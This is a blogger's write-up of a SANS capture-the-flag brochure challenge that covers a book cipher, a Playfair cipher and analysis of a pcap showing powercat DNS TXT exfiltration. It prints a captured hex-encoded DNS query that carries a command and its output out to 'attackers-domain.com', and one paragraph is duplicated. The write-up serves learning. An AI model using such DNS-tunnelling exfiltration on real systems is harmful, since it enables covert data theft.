I had to wait until the deadline passed in order to submit
my write up of this challenge. The last
entry date to be eligible for a prize was 4/20/2015.
The first part of the challenge was simple. It was three numbers separated by
commas. For example, 6,1,2. These numbers corresponded to the page,
paragraph, and word, respectively. The
answer was: The password to the next
part is pyWars. Be be to “play fair”. The flag for this part was pyWars.
“Play fair” was the hint to the next challenge. I had never heard of a “Playfair” cipher
until I used Google to find out what kind of cipher that the next part of the
challenge could be. I decoded the cipher
using an online tool, called the Braingle Playfair Decoder, that omitted q’s, and deciphered the Playfair cipher for
me. The key was pyWars, which was given in the first part of the challenge. I noticed that I had to remove the
x’s. Once deciphered, it was
http://wwxw.sans.org/event/sans-twothousandandfifteen/brochure-challenge-nineninefivecazeroethreedefourninecczeroedthrexefivebfiveeightdfiveeninedax,
or http://www.sans.org/event/sans-2015/brochure-challenge-995ca0e3de49cc0ed35b58d5e9da The flag for this part was SeeYouInOrlando2015.
The last part was a little more challenging. I had to analyze a pcap and extract a flag from it. The hint was given that the creator was suspicious that powercat.ps1 was used to extract the flag from the computer that the creator of the challenge was using. Looking at the pcap, I noted that it was all DNS traffic and that the query types were TXT. I’m not familiar with powercat, so I look up the documentation about it. Then for good measure, I look up TXT queries to see what they are. I noted that the response answers were text, so I tried in vain to decode them with a hex to text decoder from http://www.asciitohex.com. Then I realized that I was looking at the wrong part. I needed to know what the attacker was asking. So, I tried to decode the hex of the queries into ascii format. That didn't work. I noted that Wireshark had "TXT String" under the type of DNS query, so I found a hex to string decoder, on http://www.string-functions.com, and sure enough, the first record that I looked at said, “cmd.exe” It wasn’t long before I found a record, packet 103, that had this query:
The last part was a little more challenging. I had to analyze a pcap and extract a flag from it. The hint was given that the creator was suspicious that powercat.ps1 was used to extract the flag from the computer that the creator of the challenge was using. Looking at the pcap, I noted that it was all DNS traffic and that the query types were TXT. I’m not familiar with powercat, so I look up the documentation about it. Then for good measure, I look up TXT queries to see what they are. I noted that the response answers were text, so I tried in vain to decode them with a hex to text decoder from http://www.asciitohex.com. Then I realized that I was looking at the wrong part. I needed to know what the attacker was asking. So, I tried to decode the hex of the queries into ascii format. That didn't work. I noted that Wireshark had "TXT String" under the type of DNS query, so I found a hex to string decoder, on http://www.string-functions.com, and sure enough, the first record that I looked at said, “cmd.exe” It wasn’t long before I found a record, packet 103, that had this query:
6a040137d56005e844747970652062726f63687572655f666c61672e7478.740a464c41473d42726f63687572655377616e4d69636b65790d0a433a5c.62726f63687572653e.c2.xattackers-domain.com
It decoded to “type brochure_flag.tx?”. Then it showed a jumble of weird
characters. Obviously, there was some
reason that I wasn’t getting the correct flag after that command. I took the hex on that query apart, cutting
out the part where the flag should be typed.
I suspected that I could use the periods in the query as a
delimiter. So, I took out the middle
part of the query:
740a464c41473d42726f63687572655377616e4d69636b65790d0a433a5c
I used the converter on this part alone, and I got the last flag which was BrochureSwanMickey.
